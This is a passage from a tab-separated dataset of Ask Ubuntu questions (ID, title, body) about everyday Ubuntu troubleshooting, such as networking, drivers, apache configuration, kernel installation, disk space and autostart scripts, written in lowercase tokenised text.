cache ) without success . i have used a similar approach for twitter ( used python-twitter module from apt ) and it worked perfectly with the account i already had configured . my guess is the problem is with flickrapi , since the same token works with shotwell and unity-photos-lens . i have checked their sources and none do not uses flickrapi ( and shotwell is not even in python ) . i will appreciate any hints on making flickrapi work with the online accounts framework . or maybe there is another python module that works correctly with online accounts ? i have also tried flickr.py and python-flickr-api but i got impression that both are outdated - no success with them either .
314620	unable to ping ubuntu from windows	i 'm using wireless router for internet access and local wireless network . when i ping from ubuntu to windows xp over a wireless lan , it works using either ip or hostname of the windows device . but when i ping from the same windows device to ubuntu it does n't work at all ( neither ip nor hostname ) . but it works ( ping to ip but not hostname ) only when there is an remote desktop connection from ubuntu to windows . my /etc/hosts looks like : 127.0.0.1 localhost 192.168.0.2 ubuntuhostname i have samba installed and running , but firewall is definitely inactive . edit : in the router settings , i reserved the same ip address for ubuntu device in addition to explicitly defining its hostname ( and mac address ) .
314630	how can i make my lexmark x2480 ( 2400 series ) printer work ?	ubuntu can not find matching drivers and the lexmark support website says that they do not supply linux drivers for this model .
314632	about updation of ubuntu through update manager	when i check updates in update manager their are updates divide in some categories like important security update , recommended update and so on . should we install all the updates in important security updates ? please tell what settings a simple user should keep for update manager ?
314635	how to change the login type in ubuntu 13.04 ?	whenever i change to gnome fallback , ubuntu changes it right back to the default ubuntu , any help ? oh , and this is on ubuntu 13.04
314638	problems with library dependancies after upgrade from 12.10 to 13.04 ?	i am afraid that my upgrade from 12.10 to 13.04 may have messed up dependancies on my system somehow - i upgraded friday night , and the upgrade was apparently successful , but after rebooting unity shell would n't start . ( see this question ) i 've since installed xfce , and found that there seem to be other problems with the system . i tried to run google-chrome , and it failed to start with a message that it could n't open the shared library libudev0.so.0 - when i did an apt-get install google-chrome-stable , it told me it was up to date , but when i did it with the -- reinstall option , it fixed the problem . i have n't seen other problems yet - but between this and the unity issue i 'm worried that the upgrade may have seriously messed up my system -- - is there a way to recover from this , or am i going to need to do a clean re-intstall ?
314640	how to search as you type in the file dialog window in ubuntu 13.04 ?	i want to search as i type in the browse file dialog window opened when upload/save files with a web browser . is there a way to achieve this in ubuntu 13.04 ?
314644	speed internet connection up ?	my internet is extreeeeemly slow ... i have installed ubuntu few days ago , and it takes 0,5 to 2 minutes to load a simple website like google ... i booted one time with win7 which is still on my harddrive and the internet was fast ( less 2 secs for a whole youtube video . so tell me : why does it take for the same video on ubuntu 2 fuc**n minutes ? ! ? ! thanks in advance xd max network card : intel corporation pro/wireless 4965 ag or agn . computer model : intel corporation lenovo thinkpad t61 ubuntu lts 12.04 connection type : wireless no additional drivers available
314648	how to play and convert a imm4 encoded avi video ?	is there any way that i can watch this imm4 encoded avi file in ubuntu 12.04 32-bits ? this solution does not work for me : is it possible to play imm4-codec videos ?
314649	how to compile 'stygmorgan-0.29 ' ?	i am trying to compile stygmorgan-0.29.tar.bz2 and got these messages : stygmorganui.cxx:7:28 : fatal error : stygmicon128.xpm : no such file or directory compilation terminated . make [ 2 ] : *** [ stygmorganui.o ] error 1 make [ 2 ] : leaving directory `/home/papa/downloads/stygmorgan-0.29/src' make [ 1 ] : *** [ all ] error 2 make [ 1 ] : leaving directory `/home/papa/downloads/stygmorgan-0.29/src' make : *** [ all-recursive ] error 1 papa @ papa-g31-m7-te : ~/downloads/stygmorgan-0.29 $
314654	problem with lubuntu livecd	i have a problem with livecd of lubuntu . when i click `` try lubuntu '' it shows booting screen ( lubuntu with some dotes ) , but next there are yellow and black squares on the screen and i ca n't do anything . my computer : intel celeron 2.53ghz ; nvidia geforce4 mx 4000 64 mb ; hard drive : 42 gb ; ram : 512 mb . can you help me ? thx
314656	change order of monitors without changing fullscreen '' size ''	i have a dual monitor setup . my primary monitor is a 22 '' with a max resolution of 1680x1050 and my secondary is a 19 '' with a max resolution of 1280x1024 . the secondary is standing on the left side of the primary one . my problem now is , that , if i change the order of the monitors in my nvidia x-server settings , so that my secondary is the first one ( or the one on the left ) , the fullscreen mode in flash in scaled up to my secondary monitor , even if it´s displayed on my primary one . meaning that i get a 1280x1024 `` fullscreen '' window on my bigger primary monitor . when i configure my x-server settings so the secondary monitor is the one on the right , i don´t have this problem . the only thing then is , that i have to scroll out on the right to get to my monitor on the right . i can´t move my secondary monitor on the right side of my primary due to lack of space and my belief that there must be a software solution . ; ) thanks in advance .
314657	bumblebee daemon dont start on ubuntu 13.04 with t530	im trying to setup my t530 with intel hd 4000 und nvidia nvs 5400m ( 1 gb ) mit optimus . installed latest bumblebee with bumblebee-nvidia from the stable ppa and also installed primus . i set up the bios to integrated mode , do be able to boot into ubuntu . and also turned on the switch for autodetect . if i run something like optirun glxspheres i get the error : [ 1361.672499 ] [ error ] the bumblebee daemon has not been started yet or the socket path /var/run/bumblebee.socket was incorrect . [ 1361.672564 ] [ error ] could not connect to bumblebee daemon - is it running ? if i switch to optimus or discrete mode ubuntu boots into bash mode . startx stops with an error . any idea or suggestion ? best regards denym
314661	how do i create terminal shortcuts	how do i create a terminal shortcut and paste it on my desktop for this here : sudo sh /home/samuel/ @ client_name @ /yohoho
314662	how to restore my hdd after try ubuntu liveusb ?	i 'm about to try ubuntu 13.04 x64 by booting from my external hdd ( 500 gb ) . after trying i might want to restore the hdd back to normal . is it possible ? i have backup the mbr as universal usb creator said it would overwrite the existing mbr with syslinux mbr .
314663	how to install ubuntu 13.04 without a cd or usb ?	is it possible to install ubuntu raring ringtail 13.04 without cd or usb ?
314664	sending php mail from localhost	i have installed php , mysql , postfix and sendmail and have set up a simple email script on my local host server . mail ( ) returns 1 ( true ) when i send an e-mail , however the email does not arrive at the destination . installation the mail functions are part of the php core . there is no installation needed to use these functions . requirements for the mail functions to be available , php requires an installed and working email system . the program to be used is defined by the configuration settings in the php.ini file . runtime configuration the behavior of the mail functions is affected by settings in the php.ini file . mail configuration options : name default description changeable sendmail_path null unix systems only : specifies where the sendmail program can be found ( usually /usr/sbin/sendmail or /usr/lib/sendmail ) php_ini_system i found it at /usr/lib/sendmail however , i can not find the configuration file , which is where i assume my problem is , as i have not told anything which server i am using to send my mail through . if anyone can help me i would be grateful .
314665	apt-get update failed due to lack of uncompressed version of `` packages.gz ''	now that the mirrors are not offering the uncompressed version of `` packages '' , what is the official way to update the system to take into account the compressed version like `` packages.gz '' ? w : failed to fetch http : //ca.archive.ubuntu.com/ubuntu/dists/precise-backports/multiverse/binary-amd64/packages 403 forbidden [ ip : 91.189.91.15 80 ] nb : ubuntu server so no gui so it 's not a duplicate . summary : how to make apt-get look for `` packages.gz '' instead of `` packages '' ( note the `` .gz '' )
314672	xampp : http : //localhost/xampp/splash.php : english : nothing happens	after i start xampp on my ubuntu 12.04 i go to the localhost and i come to the site , where all languages are listed ... . when i click any of these languages nothing happens . follow steps are already done : i started xampp with : sudo /opt/lamp/lamp start after doing so , i get in the console , that everything is running : starting xampp for linux ... xampp : starting apache ... ok. xampp : starting mysql ... ok. xampp : starting proftpd ... ok. can you please help me solve this problem ?
314673	color seems unaligned since fixed login loop , other graphics changed ( ubuntu 12.04 )	after i fixed my previous problem ( login loop ubuntu 12.04 ) , my graphics ( only in unity afaik ) been changed . pictures and other media do n't have any problem with their display , so it is n't a problem of my driver or videocard ( it functioned fine before said login loop ) when i use the radiance theme , the color in the top bar of unity seem very unaligned . the black letters are surrounded with thin lines of other ( mixed ) colors ( primarily yellow , green and blue ) . this disappears in other themes . however in all themes , the side bar of unity ( with all shortcuts ) remains black . i believe most , shortcuts still have their original color scheme , but the ones related to ubuntu itself also got a black background ( like the dash ; workspace ; trash ; hard disk and dvd disk buttons ) . the alt+tab screen itself also got changed to a more old windows look ( xp or 2003 ) . maybe relevant is that i get a grey screen just after login , which i did n't get before this problem arose . can anyone help with this problem ? thanks in advance !
314675	mtp connection for nexus 10 12.04	very new to ubuntu cant find anything about a nexus 10 tried many commands for similar mtp but still no luck
314676	ubuntu 12.04 for vmware esxi 5.1	i 'm trying to install ubuntu 12.04 on a vpsphere esxi 5.1 box . the install get 's about half way and then crashes . wondering if ubuntu has support for a xeon e3-1245 ivy bridge processor .
314677	why kernel source is not installed	i want to install kernel source in ubuntu 12.04 which is not installed . i have checked the same using the following command : dpkg -s kernel output is kernel is not installed no information available hence i have followed the following steps to install the same : 1.installed the dependencies by the following command : sudo apt-get install gcc libncurses5-dev git-core kernel-package fakeroot build-essential sudo apt-get update & & sudo apt-get upgrade download kernel source by the following command : wget http : //www.kernel.org/pub/linux/kernel/v3.x/linux-3.5.tar.bz2 tar -xvf linux-3.5.tar.bz2 cd linux-3.5/ 3.compiled the source code to generate the .deb packages by the following command make-kpkg clean fakeroot make-kpkg -- initrd -- append-to-version=-spica kernel_image kernel_headers install the .deb packages ( two .deb packages generated , one is to install the kernel headers , another one is to install the kernel image ) by the following command sudo dpkg -i linux-*.deb but after reboot it seems kernel is not installed ( checked by dpkg -s kernel ) . please tell where i am going wrong . also , in step 3 , i guess i am installing a new kernel ( named spica kernel_image ) but during the boot up this new kernel is not showing as option . please help me
314678	teamviewer 8 on kubuntu 13.04 wo n't start	the problem is i ca n't run teamviewer on kubuntu . that problem exists for me since 12.10 and i as i remember , it was with the 7th version either . i download official package from officical web site , for 64 bit system . install it , then install all dependencies ( apt-get install -f ) . when i start it , window with license agreement appears and i ca n't agree with it , because i do n't see anything , even mouse cursor is invisible on window area . here 's the trace of teamviewer from console : kirokko ~ $ teamviewer init ... checking setup ... launching teamviewer ... fixme : service : scmdatabase_autostart_services auto-start service l '' mountmgr '' failed to start : 2 fixme : service : scmdatabase_autostart_services auto-start service l '' plugplay '' failed to start : 2 fixme : actctx : parse_depend_manifests could not find dependent assembly l '' microsoft.windows.common-controls '' ( 6.0.0.0 ) fixme : heap : heapsetinformation ( nil ) 1 ( nil ) 0 fixme : ole : coinitializesecurity ( ( nil ) , -1 , ( nil ) , ( nil ) ,0,3 , ( nil ) ,0 , ( nil ) ) - stub ! fixme : heap : heapsetinformation ( nil ) 1 ( nil ) 0 fixme : process : setprocessshutdownparameters ( 00000100 , 00000000 ) : partial stub . fixme : resource : getguiresources ( 0xffffffff,0 ) : stub fixme : win : enumdisplaydevicesw ( ( null ) ,0,0x32dc60,0x00000000 ) , stub ! fixme : win : enumdisplaydevicesw ( l '' \\\\.\\display1 '' ,0,0x32d918,0x00000000 ) , stub ! fixme : win : enumdisplaydevicesw ( ( null ) ,1,0x32dc60,0x00000000 ) , stub ! fixme : winhttp : winhttpdetectautoproxyconfigurl discovery via dhcp not supported fixme : msg : changewindowmessagefilter 233 00000001 fixme : msg : changewindowmessagefilter 4a 00000001 fixme : msg : changewindowmessagefilter 407 00000001 fixme : msg : changewindowmessagefilter 49 00000001 fixme : bitmap : createbitmapindirect planes = 0 fixme : bitmap : createbitmapindirect planes = 0 fixme : wtsapi : wtsregistersessionnotification stub 0x1005a 0x00000000 err : ole : marshal_object could n't get ipsfactory buffer for interface { 00000131-0000-0000-c000-000000000046 } err : ole : marshal_object could n't get ipsfactory buffer for interface { 00000122-0000-0000-c000-000000000046 } err : ole : stdmarshalimpl_marshalinterface failed to create ifstub , hres=0x80040155 err : ole : comarshalinterface failed to marshal the interface { 00000122-0000-0000-c000-000000000046 } , 80040155 fixme : msg : changewindowmessagefilter c04f 00000001 fixme : richedit : me_handlemessage em_setfontsize : stub fixme : dbghelp : elf_search_auxv ca n't find symbol in module wine : unhandled page fault on read access to 0xffffffff at address 0xf7585c5a ( thread 0009 ) , starting debugger ... err : seh : start_debugger could n't start debugger ( `` winedbg -- auto 8 5552 '' ) ( 2 ) read the wine developers guide on how to set up winedbg or another debugger what 's the problem ? the same problem was when i had ubuntu 12.10 installed , then the same problem was when i installed mint 14 kde ( kubuntu 12.10 ) . now i moved to kubuntu 13.04 and the problem still exists .
314679	how to ftp transfer files to /var/www ?	i 'm new to linux and i 've set up a web server with ubuntu desktop edition so i can practice with the gui a bit before transitioning to ubuntu server . i 've already set up a lamp stack as well as ftp . now i just need to know how to transfer my web files to the /var/www folder in ubuntu . previously i 've worked on mac os and there 's a central server for all the web files where i can ftp to . anyone able to help me understand how do i ftp to the /var/www folder in ubuntu ? thanks
314685	is there a way to make a fullscreen on virtualbox ?	i tried many ways to make a bigger screen in virtualbox because i do not like the small size of the guest window ? is there is a way to make it big ?
314691	ubuntu education	i 'm vishal nagda from india . i 've basic knowledge of python & c programming language , and i want to develop ubuntu applications & also wishes to join ubuntu community . so i want to ask you that what requirements and qualifications i needed to fulfill my wishes . thanks .
314693	eclipse ide looks akward in ubuntu 13.04	i have installed eclipse ide for java ee developer and the look and feel of the ide is very awkward . what is the problem ? is there any way to solve this ? i am unable to post the screen-shot as i do n't have reputation .
314699	usb mbr damaged	i installed ubuntu 13.04 on usb as live cd . i accidently removed the usb while the computer was running and after then i could n't boot from usb . tried other linux versions too nothing helped . is there a way to fix the mbr of usb .
314704	dpkg : error : duplicate file trigger interest for filename `/usr/share/icons/hicolor ' and package `hicolor-icon-theme '	i ca n't install or remove any packages right now . every aptitude or dpkg command fails with dpkg : error : duplicate file trigger interest for filename `/usr/share/icons/hicolor ' and package `hicolor-icon-theme' i tried the sed trick from dpkg : error : duplicate file trigger interest for filename `/usr/lib/gio/modules ' and package `libglib2.0-0 : i386 ' , but that did n't work for me . i 'm running 12.10 with 3.2.0-32 . edit 1 : ls -al /usr/share/icons/hicolor` total 92 drwxr-xr-x 15 root root 4096 jun 19 18:56 . drwxr-xr-x 3 root root 4096 mar 24 23:11 .. drwxr-xr-x 15 root root 4096 apr 1 2009 128x128 drwxr-xr-x 15 root root 4096 apr 1 2009 16x16 drwxr-xr-x 15 root root 4096 apr 1 2009 192x192 drwxr-xr-x 15 root root 4096 apr 1 2009 22x22 drwxr-xr-x 15 root root 4096 apr 1 2009 24x24 drwxr-xr-x 15 root root 4096 may 4 2011 256x256 drwxr-xr-x 15 root root 4096 apr 1 2009 32x32 drwxr-xr-x 15 root root 4096 apr 1 2009 36x36 drwxr-xr-x 15 root root 4096 apr 1 2009 48x48 drwxr-xr-x 15 root root 4096 apr 1 2009 64x64 drwxr-xr-x 15 root root 4096 apr 1 2009 72x72 drwxr-xr-x 15 root root 4096 apr 1 2009 96x96 -rw-r -- r -- 1 root root 1252 nov 3 2012 icon-theme.cache -rw-r -- r -- 1 root root 24671 mar 22 2012 index.theme drwxr-xr-x 15 root root 4096 apr 1 2009 scalable edit 2 : $ cat /var/lib/dpkg/triggers/file /usr/share/icons/hicolor hicolor-icon-theme /usr/share/info install-info /usr/share/wordpress/wp-content wordpress /etc/init ureadahead /etc/init.d ureadahead /usr/man man-db /usr/share/man man-db /usr/local/man man-db /usr/local/share/man man-db /usr/x11r6/man man-db /opt/man man-db /etc/ufw/applications.d ufw /etc/lsb-release plymouth-theme-ubuntu-text /usr/lib/mime/packages mime-support /etc/sgml sgml-base /usr/share/package-data-downloads update-notifier-common /usr/share/fonts fontconfig /usr/share/ghostscript/fonts fontconfig /usr/share/texmf/fonts fontconfig /usr/lib/x86_64-linux-gnu/gio/modules libglib2.0-0 : amd64 /usr/lib/gio/modules libglib2.0-0 : amd64 /usr/share/glib-2.0/schemas libglib2.0-0 : amd64 /etc/php5/conf.d libapache2-mod-php5 /usr/lib/gdk-pixbuf-2.0/2.10.0/loaders libgdk-pixbuf2.0-0 : amd64 /usr/lib/x86_64-linux-gnu/gdk-pixbuf-2.0/2.10.0/loaders libgdk-pixbuf2.0-0 : amd64 /usr/share/mime/packages shared-mime-info /usr/lib/x86_64-linux-gnu/gtk-2.0/2.10.0/immodules libgtk2.0-0 : amd64 /usr/lib/gtk-2.0/2.10.0/immodules libgtk2.0-0 : amd64 /usr/share/icons/hicolor hicolor-icon-theme
314705	12.04 scrolling two finger not working dell 6430u	i already set the two fingers scrolling in the preferences however it is not working , any ideas ?
314710	why am i getting low disk space usage ?	i have problems understanding my disk space usage . i am using ubuntu 12.04 . i am recently going low on disk space and i can not understand why . here is the result of du ( only largest folders ) . 716.0k videos 1.1m giorgio2.pdf 1.7m 2011_thesis_caroline_ferdinand.pdf 2.1m 031022_1.pdf 2.4m dgfem 29.7m aux 362.6m papers 479.3m desktop 588.6m documents 1.8g vtk 3.0g dropbox 38.0g pictures 105.9g music here is the result of df -h filesystem size used avail use % mounted on /dev/sda6 322g 304g 1.4g 100 % / udev 3.9g 4.0k 3.9g 1 % /dev tmpfs 1.6g 940k 1.6g 1 % /run none 5.0m 0 5.0m 0 % /run/lock none 3.9g 736k 3.9g 1 % /run/shm what i do n't understand is where the 304g used come from . the result of du does not sum up to that amount . that make me difficult to free space ( as you see i have only 1.4g available ) . what am i missing here ? i add an image of disk usage analyzer . the point is that the first 10 largest folders sum up to less than 165g . but still my home folder uses 312g .
314714	how to limit the upload speed of deja dup ?	i am trying to limit the upload speed of deja dup because it uses all available bandwidth and it 's a pain . right now there is a bug opened to ask for this feature but in the meantime i would like to find a workaround . my idea is to use the trickle program to start the deja dup monitor ( which is the program that actually launches deja dup ) . so the deja dup monitor program is launched by the session manager when the user logs in . the file that is responsible for that on my system ( ubuntu 13 ) is /etc/xdg/autostart/deja-dup-monitor.desktop . i have tried to edit it to replace the lines tryexec=/usr/lib/i386-linux-gnu/deja-dup/deja-dup-monitor exec=/usr/lib/i386-linux-gnu/deja-dup/deja-dup-monitor with tryexec=/usr/bin/trickle -u 30 /usr/lib/i386-linux-gnu/deja-dup/deja-dup-monitor exec=/usr/bin/trickle -u 30 /usr/lib/i386-linux-gnu/deja-dup/deja-dup-monitor but then when i logout and login again and i check with ps ax | grep dup to see if the monitor is actually running but it 's not . ( i know there is a 2 minutes waiting time before it is launched but i have removed it temporarily ) . with the original script , this command returns the process and shows that it is actually running . i have checked the logs ( syslog , dmesg ) but nothing appears , i do n't where to look or what could be wrong . so right now i use a wrapper script that launches deja dup monitor through trickle , and that script is the one that i launch though deja-dup-monitor.desktop but it is not clean , i would like the first solution to work .
314718	can i install 12.04 using wubi without an internet connection ?	do i need an active internet connection to install ubuntu 12.04 using wubi even after downloading the entire image file of the os .
314723	why is the .xsession-errors.old file so big ?	problem many users ( including me ) found out from one moment to another that the usage disk space is really strange . one day i had 50gb free and the next i had 3gb , it is just crazy . this happened with different versions of ubuntu ( 11.04 , 12.04 and 12.10 just to mention ) . some of those user have create question on this site , some of them : disk usage very strange ubuntu 12.10 recognizes me only 3gb of free space why am i getting low disk space usage ? solution @ nathanwienand have discovered that the problem was caused by the .xsession-errors.old file ( it can be found on the $ home directory ) and he and others user solved the problem removing the file . an example of the size that can have this file is ~100gb , not reasonable.. question why does this happen ? is deleting the file the only way to solve it ? is n't there another way to solve this with a large period effect ? does this problem affect only to 64 bits system 's users ? if you have something to add here , feel free to edit the question .
314729	future of nexus collection for ubuntu touch ?	will ubuntu touch have official updates in the future for nexus collection or this collection will be forgotten by canonical ?
314737	what is the difference between `` cd \ '' and `` cd / '' commands in ubuntu terminal ?	on giving cd \ , i get the > symbol while cd / changes the ~ sign in my directory to / . also ls command shows me directories like dev , root , usr in case of cd / .
314738	data on hard drive	i have a laptop that 's having some is problems with windows 7 tried everything but ca n't get it to come up with out have the original cd this is where ubuntu comes in i 'm making the switch but i want to know since i will be booting from the cd or usb and installing it on the computer what about the old data that was originally on the hard drive will it be over written ( this is what i want ) or will have have to wipe the hard drive and then install ubuntu ?
314745	how to create ( via installer script ) a task that will install my bash script so it runs on de startup ?	i 've been reading for the last couple hours about upstart , .xinitrc , .xsessions , rc.local , /etc/init.d/ , /etc/xdg/autostart , @ reboot in crontab and so many other things that i 'm totally confused ! here is my bash script . it should start/run after the desktop environment is started and it should continue to run at all times until logout/shutdown . it should start again on reboot . any time the de is running , it should run . # ! /bin/bash while true ; do if [ [ -s ~/.updatenotification.txt ] ] ; then read msg < ~/.updatenotification.txt kdialog -- title 'the software has been updated ' -- msgbox `` $ msg '' cat /dev/null > ~/.updatenotification.txt fi sleep 3600 done exit 0 i know zero about using upstart , but i understand that upstart is one way to handle this . i 'll consider other approaches but most of the things i 've been reading about are too complex for me . furthermore , i ca n't figure out which approach will meet my requirements ( which i 'll detail below ) . there are two steps in my question : how to automatically start the script above , as described above . how to `` install '' that upstart task via a bash script ( i.e. , my `` installer '' ) . i assume ( or hope ) that step 2 is almost trivial once i understand step 1 . i have to support all flavors of ubuntu desktops . therefore , the kdialog call above will be replaced . i 'm considering easybashgui for this . ( or i could use zenity on gnome de 's . ) my requirements are : the setup process ( installation ) must be done via a bash script . i can not use the gui method described in the ubuntu doc addingprogramtosessionstartup , for example . i must be able to script/automate the setup ( installing ) process using bash . currently , it is as simple as having the bash installer script copy the above script into /home/ $ user/.kde/autostart/ the setup process must be universal across ubuntu derivatives including unity and kde and gnome desktops . the same setup script ( installer ) should run on linux mint , kubuntu , xbuntu ( basically any flavor of ubuntu and major derivatives such as linux mint ) . for example , we can not continue to put a script file in /home/ $ user/.kde/autostart/ because that exists only on kde . the above script should work for each of the limited flavors we use . hence our interest in using easybashgui instead of kdialog or zenity . see below . the installed monitoring script should only be started after the desktop is started since it will display a gui message to the user if the update is found . the monitoring script ( above ) should run without root privileges , of course . but the installer ( bash script ) can be run as root . i 'm not a real developer or a sysadmin . this is a part time volunteer thing for me , so it needs to be easy/simple . i can write bash scripts and i can program a little , but i know nothing about upstart or systemd , for example . and , unfortunately , my job does n't give me time to become an expert on init systems or much of anything else related to development and sysadmin . so i have to stick with simple solutions . the easybashgui version of the script might look like this : # ! /bin/bash source easybashgui while true ; do if [ [ -s ~/.updatenotification.txt ] ] ; then read msg < ~/.updatenotification.txt message `` $ msg '' cat /dev/null > ~/.updatenotification.txt fi sleep 3600 done exit 0
314751	.htaccess causes 403 error	i have a working website on a free shared server . i decided to hire a dedicated server and purchase a domain for my website . i started uploading the files but things are n't working the way they should . first of all .htaccess is not working , however i set allowoverride from none to all in /etc/apache2/sites-available/default documentroot /var/www < directory / > options followsymlinks allowoverride none < /directory > < directory /var/www/ > options indexes followsymlinks multiviews allowoverride all order allow , deny allow from all < /directory > i restarted the server of course . i enabled mod_rewrite : a2enmod rewrite and restarted the server . this change causes a 403 forbidden access error which i am unable to work out . if i change the all back to none then .htaccess is ignored so instead of loading the website the file hierarchy is loaded ( the main page is index4.php which should be opened by .htaccess ) . if i rename index4.php to index.php the website loads , just fyi . the permissions on the file is 600 . if i change it to 444 i get 500 internal server error . i checked the logs and i see many errors of this : permission denied : file permissions deny server access : /var/www/index.html
314754	how to get the grub using virtualbox ?	i have ubuntu-12.04 on my virtualbox and i have two kernels in /boot ( old and new ) . when i restart the vbox no grub appears to choose ! and the result of cat /proc/cmdline still shows the old kernel is running . i tried pressing shift but it also does not work !
314755	e : mkinitramfs failure cpio 141 gzip 1	i 'm using ubuntu 12.04 lts with dell power-edge r720 server , facing the problem when i apt-get -f install reading package lists ... done building dependency tree reading state information ... done 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . 2 not fully installed or removed . after this operation , 0 b of additional disk space will be used . setting up linux-image-3.2.0-37-generic-pae ( 3.2.0-37.58 ) ... running depmod . update-initramfs : deferring update ( hook will be called later ) the link /initrd.img is a dangling linkto /boot/initrd.img-3.2.0-37-generic-pae examining /etc/kernel/postinst.d . run-parts : executing /etc/kernel/postinst.d/initramfs-tools 3.2.0-37-generic-pae /boot/vmlinuz-3.2.0-37-generic-pae update-initramfs : generating /boot/initrd.img-3.2.0-37-generic-pae gzip : stdout : no space left on device e : mkinitramfs failure cpio 141 gzip 1 update-initramfs : failed for /boot/initrd.img-3.2.0-37-generic-pae with 1. run-parts : /etc/kernel/postinst.d/initramfs-tools exited with return code 1 failed to process /etc/kernel/postinst.d at /var/lib/dpkg/info/linux-image-3.2.0 -37-generic-pae.postinst line 1010. dpkg : error processing linux-image-3.2.0-37-generic-pae ( -- configure ) : subprocess installed post-installation script returned error exit status 2 dpkg : dependency problems prevent configuration of linux-image-generic-pae : linux-image-generic-pae depends on linux-image-3.2.0-37-generic-pae ; however : package linux-image-3.2.0-37-generic-pae is not configured yet . dpkg : error processing linux-image-generic-pae ( -- configure ) : dependency problems - leaving unconfigured no apport report written because the error message indicates its a followup erro r from a previous failure . errors were encountered while processing : linux-image-3.2.0-37-generic-pae linux-image-generic-pae e : sub-process /usr/bin/dpkg returned an error code ( 1 ) -- -- -- -- -- -- even i tried with apt-get clean apt-get remove apt-get autoremove apt-get purge there is no difference it will show the same error message as above , even i checked the disk space -- -- -- -- -- - filesystem 1k-blocks used available use % mounted on /dev/sda6 24030076 612456 22196964 3 % / udev 16536644 4 16536640 1 % /dev tmpfs 6618884 1164 6617720 1 % /run none 5120 0 5120 0 % /run/lock none 16547208 72 16547136 1 % /run/shm cgroup 16547208 0 16547208 0 % /sys/fs/cgroup /dev/sda1 93207 75034 13361 85 % /boot /dev/sda10 9611492 1096076 8027176 13 % /tmp /dev/sda12 9611492 226340 8896912 3 % /opt /dev/sda13 9611492 152516 8970736 2 % /srv /dev/sda7 9611492 592208 8531044 7 % /home /dev/sda8 9611492 2656736 6466516 30 % /usr /dev/sda9 9611492 696468 8426784 8 % /var /dev/sda14 961237336 134563516 777845764 15 % /usr/data /dev/sda15 618991384 84498388 503050052 15 % /usr/data1 /dev/sda11 9611492 152616 8970636 2 % /usr/local -- -- -- -- -- -- -- - is there any problem on allotting the space to the partiations please let me know the solution its on urgent please help me on this issue regards
314758	ubuntu has frozen on me	i just built my own computer and installed ubuntu but when i reset my computer and took out the cd when it started up alls that happened is a purple screen appeared and nothing happens when i hit any of the keys . except for when i move my mouse all the way up the screen then i get a white and purple striped screen .
314765	how do i start bash in 13.04 ?	i have a bash script that i need to execute . it seems that i ca n't run in in my terminal because it has a slightly different syntax . i could run the first file like bash ./configure but it produces a makefile that i can not use . if i try bash make it tells me that it ca n't execute make . how do i run this make file in bash ? i tried cd /usr/bin ./bash but it tells me that it ca n't find bash . so how do i start bash ?
314769	installed gnome , but it is n't applied	i installing gnome using command sudo apt-get install gnome , and i choose gde from the x windows menu , but when i reboot nothing happened , i 'm still stacked with unity . any help ?
314770	trouble installing downloaded program	i purchased and downloaded celtx and i 'm having trouble installing it ( in ubuntu 13.04 ) . i 'm a linux newbie ( literally had it for four days ) so please be kind and do n't assume much experience with the command line , i 'm still learning . the folder with all related files/packages etc . is under `` downloads '' and i have tried several commands to try and install but i 'm just not doing it right and would appreciate help with exactly what command ( s ) to use . sudo apt-get install celtx did not work . i 'm assuming i 'm missing a step somewhere .
314771	ubuntu blinks in dell 2850	i have just installed ubuntu ( 12.0.4 tls for servers ) on a dell poweredge 2850 . during the installation , the process goes ok . however , as soon as i start the system normally ( and the text font is changed ) it starts continuously blinking : 4 seconds i can see the screen , 4 seconds is black , and so on and so forth . any ideas of what could be happening ?
314773	rename computer in ubuntu 13.04	how can i rename my computer ? renaming it in /etc/hosts and /etc/hostname does something weird . before renaming it , i am able to open these files via sublime using sudo subl /etc/hosts but when i rename my computer ( using nano ) and open any of these files using subl , i get this message : no protocol specified ( sublime_text:20071 ) : gtk-warning ** : can not open display : :0.0 so i guess renaming in the above files is not the only thing i have to do . ps : if i rename using sublime , after renaming one of the files , i get same message when i try to open other file
314774	how do i disable the upgrade to new version warning ?	after i allowed ubuntu on my notebook to upgrade to 13.4 , it lost wi-fi connection . network menu does not show wireless access points , but according to syslog it establishes connection . also , the wireless router provides ip address to the host . i do n't want to spend time on debugging and solving the problem that most probably will reappear with new update , so i decided to reinstall 12.10 version . it recognized broadcom wi-fi modem right after the boot , and everything went great , until today i powered it on and suddenly found that it is running 13.4 and all my problems are back ! is it possible to instruct it to stay with 12.10 until i decide to upgrade ?
314777	how to completely remove broken gnome/gdm installed on ubuntu server ?	i have installed an ubuntu server . it obviously comes with no graphical interface . i tried to install one with : apt-get install xserver-xorg xfonts* gnome gdm then i got an error message trying to log in with gnome and eventually i uninstalled everything : apt-get remove xserver-xorg xfonts* gnome gdm however , it seems ubuntu still has some scripts trying to launch gnome since when starting i get : starting gnome display manager fail ... stopping system v run level compatibility and the system stops forever . ( i know i can use alt+f1 . ) what should i modify to get this completely uninstalled ? i can not find anything in the rc2.d directory .
314785	problem with mtp device	world . how may i connect a mtp device on ubuntu 12.04 ? when i try to connect to transfer some music , an error message appears on the display . ( was not possible to mount the device ) my phone has the android 4 . since now , thanks .
314786	how to set up environmental variable in ubuntu ?	i have never used ubuntu before . how do i go about setting an environmental variable that points to jdk ? i installed it on my desktop . i typed in `` export java_home=~/desktop/jdk '' in the command prompt but it did n't work .
314788	administrative password does n't work	i 'm trying to install the virtual box extentions to add usb 2.0 functionality . while i install , a box pops up and asks for the administrative password . when i enter the password , it tells me it was incorrect and i ca n't install . i only have ubuntu installed on my laptop , and i 'm the only user , so the admin password is my password . any help , or is this just a bug ? i 've got 13.04 btw .
314802	is there a comprehensive list of mupdf keyboard shortcuts ?	i like mupdf 's speed , but i am exasperated by the lack of documentation and its ( unnecessarily ) hyper-minimal interface with not a menu bar or context menu in sight . does there exist a list of keyboard shortcuts for this application ? the link to the manual on the official site is dead . i only know of the following shortcuts : fit to width : shift + w fit to height : shift + h please respond with the shortcuts you know .
